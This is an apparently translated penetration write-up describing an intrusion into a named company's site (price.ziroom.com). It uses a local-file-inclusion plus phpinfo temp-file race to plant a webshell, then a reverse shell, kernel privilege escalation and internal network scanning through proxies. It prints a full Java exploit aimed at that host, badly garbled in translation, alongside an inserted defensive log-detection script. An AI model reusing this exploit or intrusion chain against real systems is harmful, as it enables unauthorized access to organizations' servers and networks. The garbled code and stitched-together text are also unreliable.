From an interesting file inclusion on a site under "chain home" to a simple internal network penetration (getshell via local file inclusion)

Source: Internet
Author: User
Tags tmp file


There probably haven't been similar cases before, have there?

One day, a friend in the group dropped a link:

http://price.ziroom.com/?_P=.../../etc/passwd000000.html

Local file inclusion exists, and the upload function is available. How can this problem be solved?

At first I felt excited. I had wanted to work through a case like this for a long time, but had never been able to because I had not found such a harsh environment.

We all know that a temporary file is generated when a form-data request is submitted to any PHP file on the server. If we can include that temporary file directly, we can execute arbitrary code; however, we must know the path and name of the temporary file.

I have to admire the ideas of the folks abroad. They found that the path and name of the temporary file can be obtained through phpinfo. With the path and name, we can include the file directly and execute arbitrary code.

Another problem is that the generated temporary file is deleted after a very short time, so what we need to do is race: include it before it is deleted.

To win the race, you must pay attention to code execution efficiency: use two while loops, with the second while loop being the core of the race. At the same time, you must increase the time it takes for the temporary file to be deleted. That is, when a large amount of data is submitted, the cached file is large enough that deletion takes relatively longer, and the probability of winning the race is greater. After understanding the principle, I wrote an application in Java. Why Java? Because Java's execution efficiency is second only to C.



Conditions for exploitation:

1. You need to know the phpinfo path;

2. The website has a file inclusion vulnerability;

3. Windows has drive letters, whereas Linux has none and uses a single tree based on the root directory. The conditions on Windows are therefore harsher: either the file inclusion must allow a drive letter to be specified, or the tmp file and the web directory must be on the same drive letter.
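From the defender's side, the race described above leaves a recognizable trace in web-server access logs. The following is an added example, not code from the original post: it flags clients that POST to a phpinfo page (which takes no input) and, within a short window, request a traversal path ending in a PHP upload temp name. The sample log lines, the 10-second window, and the Linux default `/tmp/phpXXXXXX` naming are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2016:10:00:01 +0800] "POST /phpinfo.php?a=AAAA HTTP/1.1" 200 81234
203.0.113.7 - - [12/Mar/2016:10:00:01 +0800] "GET /?_p=../../../../tmp/phpA1b2C3 HTTP/1.1" 200 512
198.51.100.9 - - [12/Mar/2016:10:00:05 +0800] "GET /?_p=news/list HTTP/1.1" 200 2048
198.51.100.9 - - [12/Mar/2016:10:02:00 +0800] "GET /phpinfo.php HTTP/1.1" 200 80211
203.0.113.7 - - [12/Mar/2016:10:00:02 +0800] "GET /?_p=..%2F..%2F..%2Ftmp%2FphpZz9Yx8 HTTP/1.1" 200 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# Traversal followed by a PHP upload temp name (assumption: Linux default, "php" + 6 chars).
TMP_INCLUDE = re.compile(r'\.\./.*?/php[A-Za-z0-9]{6}(?![A-Za-z0-9])')


def find_race_attempts(log_text, window=timedelta(seconds=10)):
    """Return (ip, decoded_target) for temp-file includes near a phpinfo POST."""
    posts = {}      # ip -> timestamps of POSTs to a phpinfo-like page
    includes = []   # (ip, timestamp, decoded request target)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, target = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        target = unquote(target)  # catch %2F-encoded traversal as well
        if method == "POST" and "phpinfo" in target.lower():
            posts.setdefault(ip, []).append(when)
        elif TMP_INCLUDE.search(target):
            includes.append((ip, when, target))
    alerts = []
    for ip, when, target in includes:
        # Correlate: same client, include request close in time to the phpinfo POST.
        if any(abs(when - p) <= window for p in posts.get(ip, [])):
            alerts.append((ip, target))
    return alerts


if __name__ == "__main__":
    for ip, target in find_race_attempts(SAMPLE_LOG):
        print(f"possible phpinfo temp-file race from {ip}: {target}")
```

Removing publicly reachable phpinfo pages takes away the temp-file name disclosure that the race depends on, so any hit on a phpinfo path is itself worth reviewing.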



After knowing the principle, you can use a program to test it.
 



The "no permission" message indicates that the root directory is not writable. After scanning the directories, a cache directory was found, which, based on experience, is writable.
 



The webshell is written successfully.
 



Intranet penetration is manual labor. Because IDS, firewalls, and other devices are installed in the network segment, the penetration took much longer.

There appears to be a unified port policy on the devices, so common intranet penetration tools such as reGeorg, Tunna, and ipvh cannot be used. Metasploit also drops from time to time. It seems that only sSocks can be used; we recommend sSocks if you face such restrictions.

Reverse shell, kernel privilege escalation to root, sSocks installed; unlike metasploit, it was found not to drop when scanning.
 


 


 

 



Although the routing table of the local machine shows 172.16.5.0/24, I found, by searching for the company's previous vulnerabilities, that other network segments can be accessed. The approximate range is 172.165.0.0/21. proxychains4, the upgraded version of proxychains, is used in combination with nmap to probe the intranet. Although metasploit is not convenient here, this is also the only method that works in this environment.
 



The intranet penetration is relatively simple. Because time is limited, it is not described in detail.
 


 

 




 

Package com. ms509; import java. io. inputStream; import java. io. printWriter; import java.net. inetAddress; import java.net. socket; import java.net. URL; import java. util. imports; import java. util. regex. matcher; import java. util. regex. pattern; public class PhpLfi {/*** @ author Chora [ms509] * @ param string webshell wants to generate the webshell path * @ param string host address * @ param string include File Inclusion Vulnerability path * @ param string phpin Address of the fophpinfo page * @ paramintport host port * @ paramintpaddingnum fill size */public static void main (String [] args) throws Exception {// TODO Auto-generated method stubString webshell = "/cache/wy. php "; String host =" price.ziroom.com "; String include =" http://price.ziroom.com /? _ P = .. /.. /.. /.. /.. /.. /.. /.20.include0000000000.html "; String phpinfo ="/phpinfo. php "; int port = 80; int paddingnum = 8000; String padding =" "; String phptmp; String url; String tmp; for (int I = 0; I
 
  
{Padding = padding + "A";} InetAddress inethost = InetAddress. getByName (host); StringBuffer sb = new StringBuffer (); StringBuffer sb2 = new StringBuffer (); sb2.append ("Listen 7dbff1ded0714 \ r \ n"); sb2.append ("Content-Disposition: form-data; name = \ "ms509 \"; filename = \ "wooyun.txt \" \ r \ n "); sb2.append (" Content-Type: text/plain \ r \ n "); sb2.append (" \ r \ n "); sb2.append ("
  ')? Print ('ms509 _ true'): print ('ms509 _ false')?> "); Sb2.append (" \ r \ n "); sb2.append (" ----------------------------- 7dbff1ded0714 "); sb. append (" POST "+ phpinfo + "? A = "+ padding +" HTTP/1.1 \ r \ n "); sb. append ("Cookie: PHPSESSID = f90b76b7840c05076ca235b05f1c4564; ms509cookie =" + padding + "\ r \ n"); sb. append ("Accept:" + padding + "\ r \ n"); sb. append ("User-agent:" + padding + "\ r \ n"); sb. append ("Accept-Language:" + padding + "\ r \ n"); sb. append ("Pragma:" + padding + "\ r \ n"); sb. append ("Content-Type: multipart/form-data; boundary = --------------------------- 7dbff1ded0714 \ r \ n"); sb. append ("Conte Nt-Length: "+ String. valueOf (sb2.length () + "\ r \ n"); sb. append ("Host:" + host + "\ r \ n"); sb. append (sb2); String sbs = sb. toString (); // System. out. println (sb. toString (); while (true) {Socket socket = new Socket (inethost, port); PrintWriter out = new PrintWriter (socket. getOutputStream (); out. write (sbs); out. flush (); String data = ""; while (data. indexOf ("") <0) {data = PhpLfi. getData (socket. getInputStream (); phptmp = PhpLfi. getPhptmp (data); if (phptmp! = Null) {url = include. replaceFirst ("\\{ include}", phptmp); tmp = PhpLfi. doGet (url); System. out. println (url); if (tmp. indexOf ("ms509_true")>-1) {System. out. println ("webshell is up! \ R \ nwebshell is http: // "+ host +": "+ port + webshell); System. exit (0);} else if (tmp. indexOf ("ms509_false")>-1) {System. out. println ("webshell up error! \ R \ nreason: \ r \ n "+ tmp); System. exit (0);} System. out. println (tmp) ;}} socket. close () ;}} public static String getData (InputStream is) throws Exception {int byteAva = is. available (); String data = ""; if (byteAva> 0) {byte [] tmp2 = new byte [byteAva]; is. read (tmp2); data = new String (tmp2);} return data;} public static String getPhptmp (String data) {String tmp = null; Matcher m = Pattern. compile ("\ [tmp_name] =>\\ s (. *?) \ S "). matcher (data); if (m. 
find () {tmp = m. group (1) ;}return tmp ;}public static String doGet (String url) {String data = ""; try {URL u = new URL (url ); inputStream in = u. openStream (); iterator = new iterator (in); while (iterator. hasNextLine () {data + = bytes. nextLine () + "\ r \ n" ;}} catch (Exception e) {// TODO Auto-generated catch blockdata = "error" ;}return data ;}}
 

 

Solution:

Filter
